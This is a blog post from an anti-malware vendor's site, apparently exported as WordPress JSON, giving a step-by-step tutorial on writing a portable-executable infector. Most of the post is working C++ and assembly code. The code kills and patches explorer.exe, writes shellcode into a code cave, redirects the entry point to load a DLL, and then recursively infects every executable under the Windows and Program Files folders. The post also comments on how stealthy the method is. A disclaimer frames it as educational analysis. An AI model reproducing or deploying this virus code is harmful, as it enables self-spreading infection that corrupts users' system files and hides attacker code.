{"id":179,"date":"2014-02-07T12:48:11","date_gmt":"2014-02-07T12:48:11","guid":{"rendered":"http:\/\/www.adlice.com\/?p=179"},"modified":"2022-12-21T10:40:27","modified_gmt":"2022-12-21T10:40:27","slug":"chronicles-pe-infector","status":"publish","type":"post","link":"https:\/\/www.adlice.com\/de\/chronicles-pe-infector\/","title":{"rendered":"Chronicles of a PE Infector"},"content":{"rendered":"\n<p><strong>[INFO] This is a blog post moved from <a title=\"original location\" href=\"http:\/\/tigzyrk.blogspot.fr\/2012\/09\/analysis-chronicles-of-pe-infector.html\">original location<\/a><\/strong><\/p>\n\n\n\n<p><strong>Recently, while roaming on forums, I came across a basic tutorial on &#8220;how to make a PE infector&#8221;. It was explaining how to modify a PE (.exe or .dll) in order to execute some custom code at its startup (it was a MessageBox &#8220;Hello world&#8221;). I tried it, and indeed it was easy. So to go further I wanted to implement a true PE infector, able to replicate itself in other files &#8230;<\/strong><\/p>\n\n\n\n<p class=\"has-text-align-center\"><strong>DISCLAIMER!<\/strong><\/p>\n\n\n\n<p><strong>This is not a &#8220;how to&#8221; to make a virus.<\/strong> This is a detailed analysis to explain how viruses (and especially PE infectors) work. <strong>You cannot use this to propagate viruses<\/strong>. This technique has been known for years by malware authors, so this is only to help &#8220;good&#8221; people understand how they work. <strong>We cannot be held responsible for damage caused by this code on your or someone else&#8217;s computer. You use it at your own risk.<\/strong><\/p>\n\n\n\n<h4 class=\"has-accent-color has-text-color wp-block-heading\"><br>Scheme of attack<\/h4>\n\n\n\n<p>Basically, the main idea is to <strong>redirect the PE execution flow from the entry point (EP) to an injected section of code (ShellCode)<\/strong>. Then the ShellCode must transfer control back to the original entry point (EP). 
This will allow the attacker to execute some code before the PE accesses its own. Here&#8217;s a schematic:<br>&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image alignnone\"><a href=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/banner.png\"><img decoding=\"async\" width=\"771\" height=\"357\" src=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/banner.png\" alt=\"Left : before patching - Right : after patching\" class=\"wp-image-180\" srcset=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/banner.png 771w, https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/banner-300x139.png 300w\" sizes=\"(max-width: 771px) 100vw, 771px\" \/><\/a><figcaption class=\"wp-element-caption\">Left : before patching &#8211; Right : after patching<\/figcaption><\/figure>\n\n\n\n<h4 class=\"has-accent-color has-text-color wp-block-heading\"><br>Infect an executable<\/h4>\n\n\n\n<p>Once the routine to infect a PE is done, <strong>we can stage a system-wide attack<\/strong>. To do this, we will proceed in two steps. <strong>The first step is to infect an important exe file: explorer.exe<\/strong>. As this file is protected (because it is running), we will simply kill its process and infect the file. 
This will force the system to reload the file (infected this time) and will trigger the runtime patching.<\/p>\n\n\n\n<p>Here&#8217;s the code of the main function.<strong> We basically get the path of explorer.exe, we kill it, wait half a second (the time for the kill to be done) and we infect it<\/strong>.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>int _tmain(int argc, _TCHAR* argv&#91;])\n{\n TCHAR win&#91;MAX_PATH] = L\"\";\n SHGetFolderPath(NULL,CSIDL_WINDOWS, NULL, SHGFP_TYPE_CURRENT, win); \/\/Windows\n  \n wstring Path = wstring(win) + L\"\\\\explorer.exe\";\n KillProcessByName(L\"explorer.exe\");\n Sleep(500);\n InfectPe(Path);\n  \n system(\"PAUSE\");\n return 0;\n}<\/code><\/pre>\n\n\n\n<p><br><strong>Let&#8217;s see the InfectPE routine, step by step&#8230;<\/strong><\/p>\n\n\n\n<p>In order to have those functions compiled in the same order as they appear in the source code, you need to <strong>remove the incremental linking from the linker options<\/strong> (thanks Shebaw).<\/p>\n\n\n\n<p>Here we simply get the address and size of the ShellCode. <strong>The size is obtained from the address of an empty function called ShellCodeEnd<\/strong>, which is only there to mark the end of the ShellCode (see below).<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\/\/ Get addresses of shellcode\nDWORD start = (DWORD)ShellCode;\nDWORD end = (DWORD)ShellCodeEnd;\nDWORD stubLength = end - start; <\/code><\/pre>\n\n\n\n<p><br><strong>We open the file to infect (explorer.exe) and we map its memory into our process context with READ and WRITE permissions<\/strong>. 
Then we check if it&#8217;s a PE (portable executable) and we save the current entry point (EP).<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\/\/ map file\nhFile = CreateFile(Path.c_str(), GENERIC_WRITE | GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);\n        \n\/\/ Get file size\nfsize = GetFileSize(hFile, 0);\n  \n\/\/ Create file mapping -- hFileMap\nhFileMap = CreateFileMapping(hFile, NULL, PAGE_READWRITE, 0, fsize, NULL);\n    \n\/\/ Create Map -- hMap\nhMap = (LPBYTE)MapViewOfFile(hFileMap, FILE_MAP_ALL_ACCESS, 0, 0, fsize);\n      \n\/\/ check signatures -- must be a PE\npDosHeader = (PIMAGE_DOS_HEADER)hMap;\nif(pDosHeader-&gt;e_magic != IMAGE_DOS_SIGNATURE) \n    goto cleanup;\n     \npNtHeaders = (PIMAGE_NT_HEADERS)((DWORD)hMap + pDosHeader-&gt;e_lfanew);\nif(pNtHeaders-&gt;Signature != IMAGE_NT_SIGNATURE) \n    goto cleanup;\n \n\/\/ Not dll\nif (pNtHeaders-&gt;FileHeader.Characteristics &amp; IMAGE_FILE_DLL\n &amp;&amp; pNtHeaders-&gt;FileHeader.Characteristics &amp; IMAGE_FILE_EXECUTABLE_IMAGE) \n    goto cleanup;\n  \n\/\/ get last section's header...\npSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)hMap + pDosHeader-&gt;e_lfanew + sizeof(IMAGE_NT_HEADERS));\npSection = pSectionHeader;\npSection += (pNtHeaders-&gt;FileHeader.NumberOfSections - 1);\n     \n\/\/ save entrypoint\noep = oepRva = pNtHeaders-&gt;OptionalHeader.AddressOfEntryPoint;\noep += (pSectionHeader-&gt;PointerToRawData) - (pSectionHeader-&gt;VirtualAddress); <\/code><\/pre>\n\n\n\n<p><br><strong>Now we look for free space (a code cave) to put our shellcode in<\/strong>, based on the shellcode size. 
We simply look for a large enough run of bytes set to 0x0.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\/\/******************************************************\n\/\/ locate free space - code cave to write the shellcode\n\/\/******************************************************\nfor(i = pSection-&gt;PointerToRawData ; i != fsize ; i++)\n{\n  if((char*)hMap&#91;i] == 0x00)\n  {\n   if(charcounter++ == stubLength + 24)\n   {\n    printf(\"&#91;+] Code cave located @ 0x%08lX\\n\", i);\n    writeOffset = i;\n   }\n  }\n  else charcounter = 0;\n}\nif(charcounter == 0 || writeOffset == 0)\n{\n  printf(\"&#91;-] Could not locate a big enough code cave\\n\");\n  goto cleanup;\n}\n     \n\/\/ decrement to rewind to the beg of the code cave\nwriteOffset -= stubLength;\n     \n\/\/ Allocate memory\nstub = (unsigned char *)malloc(stubLength + 1);\nif(!stub) goto cleanup;\n     \n\/\/ copy stub into a buffer\nmemcpy(stub, ShellCode, stubLength); \n<\/code><\/pre>\n\n\n\n<p>Then we <strong>fill in the placeholders of the ShellCode<\/strong>. By looking at the ShellCode (see below), you will see <strong>addresses initialized with 0xCCCCCCCC<\/strong>. This is a way to quickly find the data we need to replace at runtime. 
Here we have two things to replace.<\/p>\n\n\n\n<p><strong>* The address of the LoadLibrary function<\/strong><br><strong>* The initial Entry Point<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\/\/ locate offsets of place holders in code\nfor(i = 0, charcounter = 0; i != stubLength; i++)\n{\n  if(stub&#91;i] == 0xCC)\n  {\n     charcounter++;\n     if(charcounter == 4 &amp;&amp; callOffset == 0)   \/\/ First is call\n         callOffset = i - 3;\n     else if(charcounter == 4 &amp;&amp; oepOffset == 0)  \/\/ Second is OEP\n         oepOffset = i - 3;\n  }\n  else charcounter = 0;\n }\n  \n \/\/ check they're valid\n if(oepOffset == 0 || callOffset == 0)\n {\n  free(stub);\n  goto cleanup;\n }\n  \n \/\/******************************************************\n \/\/ Load Kernel32.dll to get LoadLibrary address\n \/\/******************************************************\n hKernel32 = LoadLibrary(L\"Kernel32.dll\");\n if(!hKernel32)\n {\n  free(stub);\n  printf(\"&#91;-] Could not load Kernel32.dll\");\n  goto cleanup;\n }\n  \n \/\/ fill in place holders\n *(u_long *)(stub + oepOffset) = (oepRva + pNtHeaders-&gt;OptionalHeader.ImageBase);\n *(u_long *)(stub + callOffset) = ((DWORD)GetProcAddress(hKernel32, \"LoadLibraryA\"));\n FreeLibrary(hKernel32);\n<\/code><\/pre>\n\n\n\n<p>Finally, our ShellCode is ready. 
We simply <strong>write it into the code cave we have found<\/strong>, and <strong>we overwrite the original entry point with the address of the beginning of our ShellCode<\/strong>.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\/\/ write stub\nmemcpy((PBYTE)hMap + writeOffset, stub, stubLength);\n  \n\/\/ rewrite entrypoint to point on shellcode\npNtHeaders-&gt;OptionalHeader.AddressOfEntryPoint = FileToVA(writeOffset, pNtHeaders) - pNtHeaders-&gt;OptionalHeader.ImageBase;\n  \n\/\/ set section size\npSection-&gt;Misc.VirtualSize += stubLength;\npSection-&gt;Characteristics |= IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE;\n  \n\/\/ cleanup\nprintf(\"&#91;+] Stub written!!\\n&#91;*] Cleaning up\\n\");\nfree(stub);\n  \ncleanup:\n \n\/\/ Write memory map back\nFlushViewOfFile(hMap, 0);\nUnmapViewOfFile(hMap);\n     \nSetFilePointer(hFile, fsize, NULL, FILE_BEGIN);\nSetEndOfFile(hFile);\nCloseHandle(hFileMap);\nCloseHandle(hFile);\n<\/code><\/pre>\n\n\n\n<p>Let&#8217;s see this famous ShellCode&#8230;<br>This is a very basic trick. <strong>We call LoadLibrary with the complete path of our injected DLL<\/strong>. 
<strong>This DLL will contain all the code we want to execute in the process&#8217;s context<\/strong>.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>__declspec(naked) void ShellCode()\n{\n __asm\n {\n  pushad                                \/\/ preserve our thread context\n  call GetBasePointer\n  GetBasePointer:\n  pop ebp\n  sub ebp, offset GetBasePointer        \/\/ delta offset trick.\n   \n  lea  eax, &#91;ebp+szPath]                \/\/ Path param\n  push eax\n  mov  eax, 0xCCCCCCCC                  \/\/ pattern to fill with GetProcAddr(\"LoadLibrary\")\n  call eax\n  \n  popad                                 \/\/ restore our thread context\n  push 0xCCCCCCCC                       \/\/ push address of original entrypoint\n  retn                                  \/\/ retn used as jmp\n   \n  szPath:       \/\/ C:\\\\windows\\\\system32\\\\pe.dll\n   bb('C') bb(':') bb('\\\\') bb('w') bb('i') bb('n') bb('d') bb('o') bb('w') bb('s') bb('\\\\')\n   bb('s') bb('y') bb('s') bb('t') bb('e') bb('m') bb('3') bb('2') bb('\\\\') bb('p') bb('e')\n   bb('.') bb('d') bb('l') bb('l') bb(0)     \n }\n}\n\/\/ Here to mark the end of the shellcode\n__declspec(naked) void ShellCodeEnd()\n{\n \n}\n<\/code><\/pre>\n\n\n\n<p><strong>Here&#8217;s what we get at execution:<\/strong><br>&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image alignnone\"><a href=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture2.png\"><img decoding=\"async\" width=\"665\" height=\"337\" src=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture2.png\" alt=\"Explorer.exe patching by the infector.exe\" class=\"wp-image-183\" srcset=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture2.png 665w, https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture2-300x152.png 300w\" sizes=\"(max-width: 665px) 100vw, 665px\" \/><\/a><figcaption class=\"wp-element-caption\">Explorer.exe patching by the infector.exe<\/figcaption><\/figure>\n\n\n\n<p><strong>A 
code cave has been found<\/strong>, and <strong>explorer.exe is infected<\/strong>. At its startup, it <strong>will execute our ShellCode and load the pe.dll library<\/strong> (which we copied into the right directory!)<br>&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image alignnone\"><a href=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture1.png\"><img decoding=\"async\" width=\"885\" height=\"597\" src=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture1.png\" alt=\"Explorer.exe is injected with pe.dll\" class=\"wp-image-182\" srcset=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture1.png 885w, https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture1-300x202.png 300w\" sizes=\"(max-width: 885px) 100vw, 885px\" \/><\/a><figcaption class=\"wp-element-caption\">Explorer.exe is injected with pe.dll<\/figcaption><\/figure>\n\n\n\n<h4 class=\"has-accent-color has-text-color wp-block-heading\"><br>Infect all executables<\/h4>\n\n\n\n<p><strong>Don&#8217;t stop here \ud83d\ude42 <\/strong><br>At this moment, <strong>explorer.exe is able to load our DLL at each startup<\/strong>. As <strong>Windows needs to start this program each time the system is loaded<\/strong>, we know that <strong>our code will be executed<\/strong>. By the way, <strong>having a thread inside explorer.exe is one of the finest things for an attacker, because it is inconspicuous<\/strong>.<\/p>\n\n\n\n<p>Now, we will see how this DLL can be used to <strong>infect all executables and execute some custom code<\/strong> (depending on what you want). 
See this schematic:<br>&nbsp;<br><a href=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture-2.png\"><img decoding=\"async\" class=\"alignnone size-full wp-image-181\" src=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture-2.png\" alt=\"Capture\" width=\"892\" height=\"658\" srcset=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture-2.png 892w, https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture-2-300x221.png 300w\" sizes=\"(max-width: 892px) 100vw, 892px\" \/><\/a><\/p>\n\n\n\n<p><strong>Let&#8217;s see the DLL&#8217;s code. <\/strong><br>We simply <strong>output a string at process attach<\/strong> (when the process loads the DLL) and we <strong>fire a new thread to infect all PEs<\/strong>.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>BOOL APIENTRY DllMain( HMODULE hModule,\n                       DWORD  ul_reason_for_call,\n                       LPVOID lpReserved )\n{\n DWORD ret = 0; \n switch (ul_reason_for_call)\n {\n  case DLL_PROCESS_ATTACH:\n    OutputDebugString(L\"I'm injected you know!\");\n \n    \/\/ Create Thread\n    CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)InfectAllPe, 0, 0, &amp;ret);\n    break;\n\n  case DLL_THREAD_ATTACH:\n  case DLL_THREAD_DETACH:\n  case DLL_PROCESS_DETACH:\n    break;\n }\n return TRUE;\n}\n<\/code><\/pre>\n\n\n\n<p>The thread will <strong>iterate over directories to find any .exe and patch it<\/strong>. We start at two strategic root directories: <strong>windir and programfiles<\/strong>. We also create a mutex on this thread because we don&#8217;t need each infected process to fire a mass infection over the system. 
A single thread is sufficient and the stealthiest option.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>void InfectAllPe()\n{\n HANDLE hMutex;\n TCHAR win&#91;MAX_PATH] = L\"\", progs&#91;MAX_PATH] = L\"\";\n \n \/\/ Create mutex - Return if already created.\n if (!CreateNamedMutex(L\"peinfector\", &amp;hMutex))\n  return;\n \n \/\/ Get %windir% and %progfiles%\n SHGetFolderPath(NULL,CSIDL_WINDOWS, NULL, SHGFP_TYPE_CURRENT, win); \/\/Windows\n SHGetFolderPath(NULL,CSIDL_PROGRAM_FILES, NULL, SHGFP_TYPE_CURRENT, progs); \/\/Program Files\n \n InfectDirectory(win);\n InfectDirectory(progs);\n \n \/\/ Release mutex\n ReleaseMutex(hMutex);\n}\n<\/code><\/pre>\n\n\n\n<p>The InfectDirectory function will <strong>recursively iterate over files and subdirectories, triggering the InfectPE function<\/strong> for each file (this is the same function as before). I&#8217;ve added a Sleep to relieve the CPU, as this task can be long. The quieter we are, the better.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>void InfectDirectory(wstring const&amp; path)\n{\n WIN32_FIND_DATA ffd;\n HANDLE hFind = INVALID_HANDLE_VALUE;\n \n \/\/ Build search dir\n wstring pathDir = path + L\"\\\\*\";\n \n \/\/ Find the first file in the directory.\n hFind = FindFirstFile(pathDir.c_str(), &amp;ffd);\n \n \/\/ No files\n if (INVALID_HANDLE_VALUE == hFind) return;\n \n \/\/ Loop\n do\n {\n   if (!_tcsicmp(ffd.cFileName, L\".\") || !_tcsicmp(ffd.cFileName, L\"..\"))\n     continue;\n \n   \/\/ Directories\n   else if ((ffd.dwFileAttributes &amp; FILE_ATTRIBUTE_DIRECTORY))\n   {\n     \/\/ get full path of directory\n     pathDir = path + L\"\\\\\" + wstring(ffd.cFileName);\n \n     \/\/ Iterate inside\n     InfectDirectory(pathDir);\n   }\n \n   \/\/ Files\n   else if (!(ffd.dwFileAttributes &amp; FILE_ATTRIBUTE_DIRECTORY))\n   {\n     \/\/ get full path of file\n     pathDir = path + L\"\\\\\" + wstring(ffd.cFileName);\n    \n     \/\/ Infect file\n     InfectPe(pathDir);\n   }\n 
\n   \/\/ To not occupy all CPU\n   Sleep(50);\n \n }\/\/ end do\n while (FindNextFile(hFind, &amp;ffd) != 0);\n FindClose(hFind);\n}\n<\/code><\/pre>\n\n\n\n<p><strong>Here&#8217;s what we get once Explorer has loaded the DLL:<\/strong><br>&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image alignnone\"><a href=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture3.png\"><img decoding=\"async\" width=\"640\" height=\"315\" src=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture3.png\" alt=\"File infection\" class=\"wp-image-184\" srcset=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture3.png 640w, https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture3-300x148.png 300w\" sizes=\"(max-width: 640px) 100vw, 640px\" \/><\/a><figcaption class=\"wp-element-caption\">File infection<\/figcaption><\/figure>\n\n\n\n<p>And after several minutes:<br>&nbsp;<br><a href=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture4.png\"><img decoding=\"async\" class=\"alignnone size-full wp-image-185\" src=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture4.png\" alt=\"Capture4\" width=\"956\" height=\"530\" srcset=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture4.png 956w, https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture4-300x166.png 300w\" sizes=\"(max-width: 956px) 100vw, 956px\" \/><\/a><\/p>\n\n\n\n<h4 class=\"has-accent-color has-text-color wp-block-heading\"><br>Conclusion<\/h4>\n\n\n\n<p>At this point, <strong>every .exe under Windir and Program Files is infected to load our DLL at startup.<\/strong><br>Our DLL does nothing but infect other files. 
<strong>But we can simply add a thread after our infection routine to execute some custom code with the process&#8217;s privileges.<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>BOOL APIENTRY DllMain( HMODULE hModule,\n                       DWORD  ul_reason_for_call,\n                       LPVOID lpReserved )\n{\n DWORD ret = 0; \n switch (ul_reason_for_call)\n {\n   case DLL_PROCESS_ATTACH:\n     OutputDebugString(L\"I'm injected you know!\"); \n     \/\/ Create Thread\n     CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)InfectAllPe, 0, 0, &amp;ret);\n     CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)CustomRoutine, 0, 0, &amp;ret);\n     break;\n  case DLL_THREAD_ATTACH:\n  case DLL_THREAD_DETACH:\n  case DLL_PROCESS_DETACH:\n     break;\n }\n return TRUE;\n}\n<\/code><\/pre>\n\n\n\n<p><strong>* No suspicious process<\/strong>, only a DLL <strong>thread executed by a legit process<\/strong> (explorer.exe)<br><strong>* No suspicious autostart entry<\/strong> (RUN, task, file in the startup folder, &#8230;), <strong>only an entry point hijack<\/strong> into an essential system file.<\/p>\n\n\n\n<p><strong>This makes the infection stealthier<\/strong> and harder to detect. However, a simple hash check will reveal a problem in some system files.<\/p>\n\n\n\n<p><strong>NOTE: All of this comes from a thread on Rohitab.com. See the link below.<\/strong><br>Code is from KOrUPt. Thanks to him!<\/p>\n\n\n\n<p><strong>NOTE 2: I do not provide any full source or binary, because I don&#8217;t want script kiddies to copy\/paste it and\/or use it to put some badness over the internet. 
Those who can understand and compile this code are smart enough to know what is bad and what is not.<\/strong><\/p>\n\n\n\n<h4 class=\"has-accent-color has-text-color wp-block-heading\"><br>Links<\/h4>\n\n\n\n<p>Rohitab: <a href=\"http:\/\/www.rohitab.com\/discuss\/topic\/33006-detailed-guide-to-pe-infection\/\">http:\/\/www.rohitab.com\/discuss\/topic\/33006-detailed-guide-to-pe-infection\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Writing and Analysis of a portable executable (PE) infector. Educational tutorial on how to write your own PE infector that remains hidden in the system.<\/p>\n","protected":false},"author":1,"featured_media":181,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[84],"tags":[7,155,154,149,6,88],"class_list":["post-179","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-tutorial","tag-analysis","tag-c","tag-infector","tag-patch","tag-pe","tag-portable-executable","category-84","description-off"],"views":1744,"yoast_score":69,"yoast_readable":30,"featured_image_src":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture-2.png","author_info":{"display_name":"tigzy","author_link":"https:\/\/www.adlice.com\/de\/author\/tigzy\/"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.1.1 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Chronicles of a PE Infector | Patching Legit Files \u2022 Adlice Software<\/title>\n<meta name=\"description\" content=\"Writing and Analysis of a portable executable (PE) infector. 
Educational tutorial on how to write PE infector that remains hidden.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.adlice.com\/chronicles-pe-infector\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Chronicles of a PE Infector | Patching Legit Files \u2022 Adlice Software\" \/>\n<meta property=\"og:description\" content=\"Writing and Analysis of a portable executable (PE) infector. Educational tutorial on how to write PE infector that remains hidden.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.adlice.com\/chronicles-pe-infector\/\" \/>\n<meta property=\"og:site_name\" content=\"Adlice Software\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/RogueKiller\" \/>\n<meta property=\"article:published_time\" content=\"2014-02-07T12:48:11+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-12-21T10:40:27+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture-2.png\" \/>\n\t<meta property=\"og:image:width\" content=\"892\" \/>\n\t<meta property=\"og:image:height\" content=\"658\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"tigzy\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@AdliceSoftware\" \/>\n<meta name=\"twitter:site\" content=\"@AdliceSoftware\" \/>\n<meta name=\"twitter:label1\" content=\"Verfasst von\" \/>\n\t<meta name=\"twitter:data1\" content=\"tigzy\" \/>\n\t<meta name=\"twitter:label2\" content=\"Gesch\u00e4tzte Lesezeit\" \/>\n\t<meta name=\"twitter:data2\" content=\"10\u00a0Minuten\" \/>\n<script type=\"application\/ld+json\" 
class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.adlice.com\/chronicles-pe-infector\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.adlice.com\/chronicles-pe-infector\/\"},\"author\":{\"name\":\"tigzy\",\"@id\":\"https:\/\/www.adlice.com\/#\/schema\/person\/a02b30804320a4059d268dc2567a307d\"},\"headline\":\"Chronicles of a PE Infector\",\"datePublished\":\"2014-02-07T12:48:11+00:00\",\"dateModified\":\"2022-12-21T10:40:27+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.adlice.com\/chronicles-pe-infector\/\"},\"wordCount\":1094,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/www.adlice.com\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.adlice.com\/chronicles-pe-infector\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture-2.png\",\"keywords\":[\"analysis\",\"c++\",\"infector\",\"patch\",\"pe\",\"portable executable\"],\"articleSection\":[\"Tutorial\"],\"inLanguage\":\"de\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.adlice.com\/chronicles-pe-infector\/\",\"url\":\"https:\/\/www.adlice.com\/chronicles-pe-infector\/\",\"name\":\"Chronicles of a PE Infector | Patching Legit Files \u2022 Adlice Software\",\"isPartOf\":{\"@id\":\"https:\/\/www.adlice.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.adlice.com\/chronicles-pe-infector\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.adlice.com\/chronicles-pe-infector\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture-2.png\",\"datePublished\":\"2014-02-07T12:48:11+00:00\",\"dateModified\":\"2022-12-21T10:40:27+00:00\",\"description\":\"Writing and Analysis of a portable executable (PE) infector. 
Educational tutorial on how to write PE infector that remains hidden.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.adlice.com\/chronicles-pe-infector\/#breadcrumb\"},\"inLanguage\":\"de\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.adlice.com\/chronicles-pe-infector\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\/\/www.adlice.com\/chronicles-pe-infector\/#primaryimage\",\"url\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture-2.png\",\"contentUrl\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture-2.png\",\"width\":892,\"height\":658},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.adlice.com\/chronicles-pe-infector\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.adlice.com\/de\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Chronicles of a PE Infector\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.adlice.com\/#website\",\"url\":\"https:\/\/www.adlice.com\/\",\"name\":\"Adlice Software\",\"description\":\"Anti-malware and analysis tools\",\"publisher\":{\"@id\":\"https:\/\/www.adlice.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.adlice.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.adlice.com\/#organization\",\"name\":\"Adlice 
Software\",\"url\":\"https:\/\/www.adlice.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\/\/www.adlice.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2020\/05\/B1rTNpTG_400x40_10.png\",\"contentUrl\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2020\/05\/B1rTNpTG_400x40_10.png\",\"width\":276,\"height\":276,\"caption\":\"Adlice Software\"},\"image\":{\"@id\":\"https:\/\/www.adlice.com\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/RogueKiller\",\"https:\/\/x.com\/AdliceSoftware\",\"https:\/\/fr.linkedin.com\/company\/adlice-software\",\"https:\/\/www.youtube.com\/channel\/UC4CQ-gIZMGWxl-auf0QqYhQ\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.adlice.com\/#\/schema\/person\/a02b30804320a4059d268dc2567a307d\",\"name\":\"tigzy\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\/\/www.adlice.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/d81e380961b1b69969fa84994ad1e4cba26afe93a49d8dd3148e9c33ffe4ccac?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/d81e380961b1b69969fa84994ad1e4cba26afe93a49d8dd3148e9c33ffe4ccac?s=96&d=mm&r=g\",\"caption\":\"tigzy\"},\"description\":\"Founder and owner of Adlice Software, Tigzy started as lead developer on the popular Anti-malware called RogueKiller. Involved in all the Adlice projects as lead developer, Tigzy is also doing research and reverse engineering as well as writing blog posts.\",\"url\":\"https:\/\/www.adlice.com\/de\/author\/tigzy\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. 